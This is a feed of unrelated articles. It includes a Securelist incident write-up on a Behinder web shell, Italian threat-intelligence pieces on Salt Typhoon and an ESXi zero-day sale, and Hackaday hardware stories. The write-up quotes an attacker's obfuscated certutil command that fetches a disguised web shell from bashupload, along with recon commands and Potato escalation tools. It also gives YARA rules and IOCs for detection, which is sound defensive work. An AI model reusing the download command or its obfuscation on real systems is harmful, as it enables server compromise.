2. Eliminare i gap di visibilità cross-domain: modernizzando le strategie di rilevamento e risposta con soluzioni XDR e SIEM di nuova generazione, svolgendo threat hunting proattivo e utilizzando intelligence sulle minacce.
3. Difendere il cloud come infrastruttura core: utilizzare CNAPP con capacità CDR, eseguire audit regolari per scoprire configurazioni errate e vulnerabilità non patchate.
4. Dare priorità al patching dei sistemi critici e utilizzare strumenti come Falcon Exposure Management per concentrarsi sulle vulnerabilità ad alto rischio.
5. Adottare un approccio basato sull’intelligence, integrare l’intelligence nelle operazioni di sicurezza, avviare programmi di consapevolezza degli utenti e svolgere esercitazioni di tabletop e red/blue teaming.

L'articolo Red Hot Cyber Intervista CrowdStrike sul Global Threat Report 2025 proviene da il blog della sicurezza informatica.

Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.

This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.

Onset

It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.

From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.

As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.

A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]

Aftermath

To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato

Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.

With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?

Identifying the threat

Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:

Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)

In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:

The “extraData” structure example

Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.

Uncovering modules and variants

By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:

Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample

Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames

Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:

Sample FC793D722738C7FCDFE8DED66C96495B relations on VT

Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.

Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.

The bigger picture

Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:

ASPX web shell side by side with .NET payload

Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.

Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.

For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.

Happy hunting and see you on the next mission!

YARA rule

rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}

Indicators of compromise

Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll

File paths

C:\ProgramData\DRM\
C:\Users\Default\Videos\

securelist.com/soc-files-web-s…

[Nicholas LaBonte] shows off a Cyberdeck Handheld that demonstrates just how good something can look when care and attention goes into the design and fabrication. He wanted to make something that blended cyberpunk and nautical aesthetics with a compact and elegant design, and we think he absolutely succeeded.

On the inside is a Raspberry Pi and an RTL-SDR. The back of the unit is machined from hardwood, and sports a bronze heat sink for the Raspberry Pi. The front has a prominent red PSP joystick for mouse input and a custom keyboard. The keyboard is especially interesting. On the inside it’s a custom PCB with tactile switches and a ATmega32U4 running QMK firmware — a popular choice for DIY keyboards — and presents to the host as a regular USB HID device.
The keys are on a single plate of little tabs, one for each key, that sits between the front panel and press on the tact switches inside.
How did he make those slick-looking keys? It’s actually a single plate that sits between the front panel and the switches themselves. [Nicholas] used a sheet of polymer with a faux-aluminum look to it and machined it down, leaving metal-looking keys with engraved symbols as tabs in a single panel. It looks really good, although [Nicholas] already has some ideas about improving it.

On the right side is the power button and charging port, and astute readers may spot that the power button is where a double-stack of USB ports would normally be on a Raspberry Pi 5. [Nicholas] removed the physical connectors, saving some space and connecting the USB ports internally to the keyboard and SDR.

As mentioned, [Nicholas] is already full of ideas for improvements. The bronze heat sink isn’t as effective as he’d like, the SDR could use some extra shielding, and the sounds the keyboard ends up making could use some work. Believe it or not, there’s still room to spare inside the unit and he’d maybe like to figure out a way to add a camera, GPS receiver, or maybe a 4G modem. We can’t wait! Get a good look for yourself in the video, embedded below.

youtube.com/embed/u8kYHgKKhjY?…

hackaday.com/2025/02/27/a-prec…

Negli ultimi mesi, il gruppo di hacker cinese conosciuto come Salt Typhoon ha continuato a far parlare di sé grazie alle sue tattiche aggressive e persistenti nel settore della cybersicurezza.

Nonostante le sanzioni imposte dagli Stati Uniti e un’attenta sorveglianza governativa, Salt Typhoon ha dimostrato di non rallentare le proprie attività, continuando a lanciare attacchi coordinati contro istituzioni educative e infrastrutture critiche a livello globale.

Salt Typhoon (RedMike): Una Minaccia Globale

Recenti rapporti indicano che il gruppo ha mirato a diversi fornitori di telecomunicazioni e università in vari paesi, principalmente Stati Uniti, Regno Unito, Sudafrica. Queste incursioni hanno permesso agli hacker di compromettere dispositivi cruciali, estraendo informazioni sensibili come dati scientifici e tecnologia proprietaria.

Da quanto viene riportato dalle dashboard della piattaforma di intelligence di Recorded Future (Partner strategico di Red Hot Cyber), gli attacchi hanno iniziato ad aumentare in modo sensibile da febbraio di questo anni con dei picchi nelle date del 13 e del 21 di questo mese.
Trend degli attacchi di Salt Typhoon, informazioni prelevate dalla piattaforma di Recorded Future, partner tecnologico di Red Hot Cyber sulla Cyber Threat Intelligence

Lo sfruttamento delle CVE di CISCO IOS XE

Dall’inizio di dicembre 2024, Salt Typhoon (RedMike) ha tentato di sfruttare oltre 1.000 dispositivi di rete Cisco esposti su Internet in tutto il mondo, principalmente quelli associati ai provider di telecomunicazioni, utilizzando una combinazione di due vulnerabilità di escalation dei privilegi: CVE-2023-20198 e CVE-2023-20273. Una volta compromesso con successo, il gruppo utilizza il nuovo account utente privilegiato per modificare la configurazione del dispositivo e aggiunge un tunnel GRE per l’accesso persistente e l’esfiltrazione dei dati.

La vulnerabilità di escalation dei privilegi CVE-2023-20198 è stata trovata nella funzionalità Web UI del software Cisco IOS XE, versione 16 e precedenti, e pubblicata da Cisco nell’ottobre 2023. Gli aggressori sfruttano questa vulnerabilità per ottenere l’accesso iniziale al dispositivo ed emettono un comando privilege 15 per creare un utente locale e una password. In seguito, l’aggressore utilizza il nuovo account locale per accedere al dispositivo e sfrutta una vulnerabilità di escalation dei privilegi associata, CVE-2023-20273, per ottenere i privilegi di utente root.
Distribuzione geografica dei dispositivi CISCO sfruttati da Red Mike (Salt Typhoone) (Fonte Recorded Future)
Oltre la metà dei dispositivi Cisco presi di mira da RedMike si trovavano negli Stati Uniti, in Sud America e in India. I dispositivi rimanenti si estendevano su oltre 100 altri paesi. Sebbene i dispositivi selezionati siano principalmente associati a provider di telecomunicazioni, tredici erano collegati a università in Argentina, Bangladesh, Indonesia, Malesia, Messico, Paesi Bassi, Thailandia, Stati Uniti e Vietnam.

Tale comportamento mette in evidenza la minaccia continua rappresentata dagli attori sponsorizzati dagli stati e la loro capacità di compromettere la sicurezza nazionale. Particolarmente preoccupante è la strategia di Salt Typhoon di sfruttare vulnerabilità nei dispositivi Cisco.

Gli obiettivi di Salt Typhoon (RedMike)

La Cina ha sviluppato un’ampia rete di operazioni di spionaggio informatico mirate a istituzioni accademiche, aziende e governi stranieri, con l’obiettivo di ottenere vantaggi strategici in settori chiave come l’intelligenza artificiale, la crittografia e la tecnologia quantistica. Gruppi di hacker sponsorizzati dallo Stato, come Brass Typhoon APT41 e Violet Typhoon APT31, sono stati collegati a campagne di attacco sofisticate che sfruttano vulnerabilità nei sistemi informatici di università e centri di ricerca per esfiltrare dati sensibili. Queste operazioni non si limitano al cyberspazio, ma coinvolgono anche il reclutamento di ricercatori e studenti stranieri attraverso programmi di scambio accademico e collaborazioni scientifiche, che spesso fungono da copertura per il trasferimento illecito di conoscenze.

Parallelamente, il governo cinese utilizza società di copertura e joint venture con istituzioni occidentali per acquisire tecnologie emergenti senza destare sospetti. Attraverso iniziative come il programma “Thousand Talents”, Pechino ha incentivato il rientro di scienziati e ingegneri cinesi dall’estero, spesso con informazioni e brevetti ottenuti illegalmente.

Inoltre, le cyber-operazioni cinesi hanno preso di mira fornitori di infrastrutture critiche, tra cui aziende di telecomunicazioni e contractor della difesa, con l’intento di compromettere la sicurezza delle comunicazioni e raccogliere dati di intelligence strategici. Queste attività, sempre più sofisticate, come quelle di Salt Typhoon (RedMike), hanno portato a crescenti tensioni tra la Cina e le potenze occidentali, con sanzioni e misure di ritorsione da parte di Stati Uniti ed Europa per contrastare l’aggressiva espansione dello spionaggio informatico cinese.

Gli attacchi di Febbraio 2025

Il 15 febbraio 2025, Salt Typhoon ha sferrato moltissimi attacchi che hanno colpito 13 università e cinque fornitori di servizi Internet, inclusi quelli in Italia. Queste aggressioni segnano un notevole incremento della campagna di Salt Typhoon, considerata una delle più grandi operazioni di cyber-spionaggio condotte dalla Cina contro gli Stati Uniti. Le conseguenze di questi attacchi non si limitano a violazioni immediate dei dati, ma pongono interrogativi sugli impatti a lungo termine sulla ricerca accademica e sull’innovazione tecnologica.

E’ stata violata con successo un’affiliata statunitense di una società di telecomunicazioni del Regno Unito, vari provider di servizi Internet (ISP) e 13 università, tra cui importanti istituzioni come l’UCLA. Nel corso del mese di febbraio, Cisco ha confermato che questa falla è stata utilizzata per colpire le reti di telecomunicazione statunitensi, dimostrando la persistenza del gruppo nell’utilizzare sia le vulnerabilità consolidate che quelle più recenti per mantenere l’accesso ai sistemi compromessi.

Gli attacchi non si sono limitati agli Stati Uniti, ma si sono estesi anche a entità internazionali, tra cui ISP in Italia, Sudafrica e Thailandia. L’ampiezza di questi attacchi ha destato notevoli preoccupazioni per quanto riguarda la sicurezza dei dati sensibili e l’integrità delle infrastrutture di telecomunicazione su scala globale.

In generale le attività malevole di Salt Typhoon (Red Mike) hanno sfruttato le vulnerabilità identificate come CVE-2023-20198 e CVE-2023-20273, che hanno facilitato l’accesso non autorizzato ai router Cisco IOS XE. Ciò ha permesso agli aggressori di manipolare i dispositivi di rete e potenzialmente di esfiltrare dati sensibili.

Malware utilizzato da Salt Typhoon per compromettere le reti

Salt Typhoon (RedMike) dopo aver avuto accesso e compromesso i router CISCO, impiega una serie di sofisticati malware per infiltrarsi e compromettere le reti in vari settori.

MASOL RAT

Uno degli strumenti principali del loro arsenale è una versione personalizzata del MASOL RAT (Remote Access Trojan),che consente agli aggressori di ottenere il controllo remoto dei sistemi infetti.

Questo malware è particolarmente efficace nell’esfiltrazione di dati sensibili, nel monitoraggio delle attività degli utenti e nell’esecuzione di comandi sulle macchine compromesse. L’uso del MASOL RAT evidenzia l’attenzione strategica di Salt Typhoon per la furtività e la persistenza, che gli consentono di mantenere l’accesso a lungo termine alle reti mirate senza essere individuati.

MASOL RAT, tracciato da TrendMicro dal 2020 può essere utilizzato per prendere di mira entità governative del sud-est asiatico. In base alla stringa PDB della backdoor (E:\Masol_https190228\x64\Release\Masol.pdb), si ritiene che il Remote Access Trojan possa essere stata sviluppato già nel 2019. E’ stata osservata anche una nuova variante Linux in circolazione dopo il 2021.
La configurazione del malware MASOL RAT estratta (Fonte TrendMicro)

JumbledPath

In un rapporto pubblicato da Cisco Talos il 20 febbraio, i ricercatori hanno confermato che Salt Typhoon ha ottenuto l’accesso all’infrastruttura di rete principale tramite dispositivi Cisco e ha poi utilizzato tale infrastruttura per raccogliere una serie di informazioni.
Panoramica sulla gestione dei dati JumbledPath (Fonte Cisco Talos)
L’approccio di Salt Typhoon per ottenere l’accesso iniziale ai dispositivi Cisco è quello di ottenere le credenziali di accesso legittime della vittima utilizzando tecniche LOTL (Living-off-the-Land) sui dispositivi di rete.

Salt Typhoon (RedMike) ha utilizzato un’utilità personalizzata, denominata JumbledPath, che gli ha consentito di eseguire un’acquisizione di pacchetti su un dispositivo Cisco remoto tramite un jump-host definito dall’attore. Questo strumento ha anche tentato di cancellare i log e compromettere la registrazione lungo il jump-path e restituire l’acquisizione compressa e crittografata risultante tramite un’altra serie unica di connessioni o jump definiti dall’attore.

Ciò ha consentito all’attore della minaccia di creare una catena di connessioni ed eseguire l’acquisizione su un dispositivo remoto. L’utilizzo di questa utilità contribuirebbe a offuscare la fonte originale e la destinazione finale della richiesta e consentirebbe inoltre al suo operatore di muoversi attraverso dispositivi o infrastrutture potenzialmente altrimenti non raggiungibili pubblicamente (o instradabili).
Metodo di Salt Typhoon per Bypassare gli elenchi di controllo degli accessi (Fonte Cisco Talos)
Questa utility è stata scritta in GO e compilata come binario ELF usando un’architettura x86-64. La compilazione dell’utility usando questa architettura la rende ampiamente utilizzabile su sistemi operativi Linux, che includono anche una varietà di dispositivi di rete multi-vendor. Questa utility è stata trovata in istanze Guestshell configurate dall’attore su dispositivi Cisco Nexus.

L’autore della minaccia ha modificato ripetutamente l’indirizzo dell’interfaccia loopback su uno switch compromesso e ha utilizzato tale interfaccia come origine di connessioni SSH ad altri dispositivi all’interno dell’ambiente di destinazione, il che gli ha consentito di aggirare di fatto gli elenchi di controllo di accesso (ACL) in vigore su tali dispositivi.

Un tipico attacco di Salt Typhoon

Salt Typhoon (RedMike), spesso prevede un approccio multiforme che sfrutta vulnerabilità note in dispositivi di rete ampiamente utilizzati, in particolare quelli di Cisco.

Un altro comportamento degno di nota mostrato da Salt Typhoon consiste nello sfruttare le tecniche LOTL (Living-off-the-Land) sui dispositivi di rete, abusando dell’infrastruttura affidabile come punto di snodo per passare da una società di telecomunicazioni all’altra. Di seguito viene riportata l’infrastruttura di sfruttamento di Salt Typhoon:
Infrastruttura di sfruttamento del dispositivo di rete Cisco RedMike (Fonte: Recorded Future)

Ricognizione

Salt Typhoon inizia con un’ampia ricognizione per identificare i potenziali obiettivi all’interno delle infrastrutture critiche, come i fornitori di telecomunicazioni e le istituzioni scolastiche. Questa fase può comportare la scansione dei dispositivi vulnerabili, la raccolta di informazioni sulle configurazioni di rete e l’identificazione del personale chiave.
Tecniche, Tattiche e Procedure (TTPs) degli attacchi di Salt Typhoon, informazioni prelevate dalla piattaforma di Recorded Future, partner tecnologico di Red Hot Cyber sulla Cyber Threat Intelligence

Sfruttamento delle vulnerabilità

Il gruppo sfrutta spesso specifiche vulnerabilità nei dispositivi Cisco. Ad esempio, è noto che sfrutta vulnerabilità come CVE-2018-0171 e CVE-2023-20198. Queste vulnerabilità consentono agli aggressori di ottenere l’accesso non autorizzato ai dispositivi di rete inviando messaggi o comandi artigianali, provocando condizioni di denial-of-service o l’esecuzione di codice arbitrario.

Accesso iniziale e furto di credenziali

Una volta ottenuto l’accesso iniziale attraverso lo sfruttamento delle vulnerabilità, Salt Typhoon utilizza spesso malware come il MASOL RAT (come visto in precedenza) o kit di exploit personalizzati. Questi strumenti consentono agli aggressori di stabilire un punto d’appoggio all’interno della rete, di esfiltrare dati sensibili e di raccogliere credenziali legittime per ulteriori accessi. Il furto di credenziali è cruciale perché consente di aumentare il livello di accesso.

Come difendersi dagli attacchi di Salt Typhoon

Salt Typhoon (RedMike) ha tentato di sfruttare più di 1.000 dispositivi Cisco a livello globale. Il gruppo ha probabilmente compilato un elenco di dispositivi target in base alla loro associazione con le reti dei provider di telecomunicazioni. Insikt Group di Recorded Future ha anche osservato che RedMike stava prendendo di mira dispositivi associati a università in Argentina, Bangladesh, Indonesia, Malesia, Messico, Paesi Bassi, Thailandia, Stati Uniti (USA) e Vietnam.

Per proteggersi dagli attacchi di Salt Typhoon (RedMike), le organizzazioni devono implementare una strategia di cybersecurity completa che enfatizzi la gestione delle vulnerabilità, la sicurezza della rete e la formazione dei dipendenti. Ecco alcune misure chiave da considerare:

• Gestione delle patch: Aggiornare e applicare regolarmente le patch a tutto il software, in particolare ai dispositivi di rete come router e switch Cisco. Assicurarsi che le vulnerabilità note, come CVE-2018-0171, CVE-2023-20198 e CVE-2023-20273, vengano affrontate tempestivamente.
• Segmentazione della rete: Implementare la segmentazione della rete per limitare gli spostamenti laterali all’interno della rete. Ciò rende più difficile per gli aggressori accedere ai sistemi critici se riescono a compromettere una parte meno sicura della rete.
• Controlli di accesso: Applicare controlli di accesso rigorosi e il principio del minimo privilegio. Assicurarsi che gli utenti abbiano solo l’accesso necessario per i loro ruoli e rivedere e aggiornare regolarmente queste autorizzazioni.
• Autenticazione a più fattori (MFA): Abilitare l’autenticazione a più fattori per l’accesso a sistemi e applicazioni sensibili per aggiungere un ulteriore livello di sicurezza contro il furto di credenziali.
• Monitoraggio e rilevamento: Implementare solidi sistemi di monitoraggio e di rilevamento delle intrusioni per identificare attività insolite e potenziali violazioni. [Esaminare regolarmente i registri e gli avvisi di sicurezza per individuare eventuali segnali di comportamento sospetto.
• Piano di risposta agli incidenti: Sviluppare e aggiornare regolarmente un piano di risposta agli incidenti che delinei le procedure di risposta agli incidenti di cybersecurity. [6]

Conclusioni

Salt Typhoon è salito alla ribalta a causa della sua recente infiltrazione nell’infrastruttura delle telecomunicazioni commerciali. I senatori statunitensi hanno definito l’attacco “strabiliante”, affermando che dovrebbe fungere da “campanello d’allarme” per le aziende che si ritiene siano state violate, tra cui AT&T, Verizon e Lumen.

RedMike ha probabilmente preso di mira queste università per accedere alla ricerca in aree correlate a telecomunicazioni, ingegneria e tecnologia, in particolare presso istituzioni come UCLA e TU Delft. Oltre a questa attività, a metà dicembre 2024, RedMike ha anche eseguito una ricognizione di più indirizzi IP di proprietà di un provider di telecomunicazioni con sede in Myanmar, Mytel.

La continua esposizione di vulnerabilità nei dispositivi Cisco ha portato a una crescente preoccupazione tra i fornitori di servizi e le istituzioni, costringendoli a rivedere le loro strategie di sicurezza. È diventato evidente che la protezione delle reti e dei dati è di fondamentale importanza per preservare non solo la sicurezza nazionale, ma anche la fiducia del pubblico nei sistemi digitali.

Di fronte a queste minacce in evoluzione, esperti del settore e professionisti della cybersicurezza sottolineano l’importanza di misure di sicurezza robuste e difese proattive. È necessario che le organizzazioni conducano approfondite valutazioni delle loro reti, focalizzandosi in particolare sulle vulnerabilità all’interno dei dispositivi Cisco. La situazione attuale serve da monito sulla necessità di una vigilanza continua contro avversari sofisticati come Salt Typhoon e i suoi affiliati.

Mentre il gruppo continua a lanciare attacchi mirati contro infrastrutture critiche e istituzioni educative, è fondamentale che le organizzazioni di tutto il mondo migliorino le loro posture di sicurezza e collaborino per condividere informazioni, riducendo i rischi posti da tali minacce informatiche. La battaglia contro il cyber spionaggio è tutt’altro che finita, e solo attraverso uno sforzo collettivo la comunità internazionale può sperare di salvaguardare le proprie frontiere digitali.

Questo articolo è stato redatto attraverso l’utilizzo della piattaforma di Recorded Future, partner strategico di Red Hot Cyber e Leader Mondiale nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.

L'articolo Salt Typhoon (RedMike): La Cyber Minaccia Cinese che Sta Scuotendo il Mondo proviene da il blog della sicurezza informatica.

In the rush to always have the latest and greatest, it’s not uncommon that perfectly serviceable hardware ends up collecting dust in a drawer somewhere. If you’ve got an old Kindle laying around, you may be interested in this write-up from [Hemant] that shows a practical example of how the popular e-reader can be pushed into service as a weather dashboard.

The first step is to jailbreak the Kindle, providing the user with root access to the device. From there the Kindle Unified Application Launcher (KUAL) is installed along with USBNetwork which allows you to connect to the reader over SSH. With root access and a network connection, the real project of converting it to a weather dashboard begins. [Hemant] split the project into two parts here, a Node.js server that scrapes weather data from the internet and converts it into an image, and a client for the Kindle that receives this image for display.

The Kindle has a number of quirks and issues that [Hemant] covers as well, including handling image ghosting on the e-ink display as well as a problem where the device will hang if the Internet connection is lost. For those with jailbroken Kindles that want to put their devices back into useful service, this is an excellent guide for getting started and [Hemant] also provided all of the source code on the project’s GitHub page.

There has been a long tradition of using Kindles for things other than e-readers, and even devices with major hardware problems can still have useful life in them thanks to this project which allows the e-ink display to have a second life on its own.

hackaday.com/2025/02/27/shelve…

Un presunto exploit zero-day per VMware ESXi è apparso nei forum underground, offerto da un criminale informatico noto come “Vanger“.

Secondo le informazioni trapelate, l’exploit consentirebbe l’evasione dalla macchina virtuale (VM Escape), una delle minacce più critiche per gli ambienti virtualizzati. Il prezzo? 150.000 dollari. Ma è reale o un ennesimo tentativo di frode?

Il pericolo del VM Escape

Se autentico, questo exploit potrebbe consentire agli attaccanti di bypassare il livello di isolamento garantito dall’hypervisor ESXi, compromettendo il sistema host e le altre VM in esecuzione sullo stesso server. Ciò significa accesso non autorizzato ai dati sensibili, diffusione di malware e possibilità di movimento laterale all’interno della rete aziendale.

Le versioni affette sarebbero comprese tra la 5.5 e la 8.0, inclusi aggiornamenti specifici come ESXi 8.0 Update 3c e versioni precedenti. L’inserzione di Vanger elenca dettagliati numeri di build, suggerendo una conoscenza approfondita dell’ecosistema VMware.

Affare reale o ennesima truffa nei forum underground?

Non è la prima volta che sui marketplace del dark web vengono messi in vendita exploit con promesse da capogiro. Tuttavia, il venditore non vanta una reputazione solida nel settore degli exploit: le sue precedenti attività si limitavano alla vendita di credenziali di accesso aziendali compromesse.

Questo solleva forti dubbi sull’autenticità dell’exploit e sull’affidabilità della fonte. Potrebbe trattarsi di una frode? Assolutamente sì, ma il rischio che sia reale non può essere sottovalutato.

Le contromisure: come proteggersi da un possibile attacco

Indipendentemente dalla veridicità di questa minaccia, il solo fatto che venga pubblicizzata dimostra come le infrastrutture virtualizzate siano nel mirino del cybercrime. Le aziende devono adottare un approccio di sicurezza a più livelli per proteggere i propri ambienti:

• Patch Management: aggiornare regolarmente VMware ESXi e gli strumenti associati per chiudere le vulnerabilità note.
• Isolamento: limitare le funzionalità di condivisione tra VM e host, come clipboard e cartelle condivise.
• Monitoraggio: implementare soluzioni di sicurezza avanzate per rilevare attività sospette sia sulle VM che sull’host.
• Access Control: restringere i privilegi amministrativi e applicare l’autenticazione a più fattori per l’accesso agli hypervisor.

Conclusione

Che sia un inganno o meno, questo presunto exploit zero-day mette in luce una realtà inconfutabile: gli attori delle minacce stanno puntando sempre più aggressivamente alle infrastrutture virtualizzate.

La sicurezza non è un’opzione, ma una necessità. Mantenere i sistemi aggiornati e implementare misure di protezione robuste è l’unica difesa contro un panorama di minacce in continua evoluzione.

L'articolo Exploit Zeroday per VMware ESXi in vendita sul Dark Web per 150.000 dollari proviene da il blog della sicurezza informatica.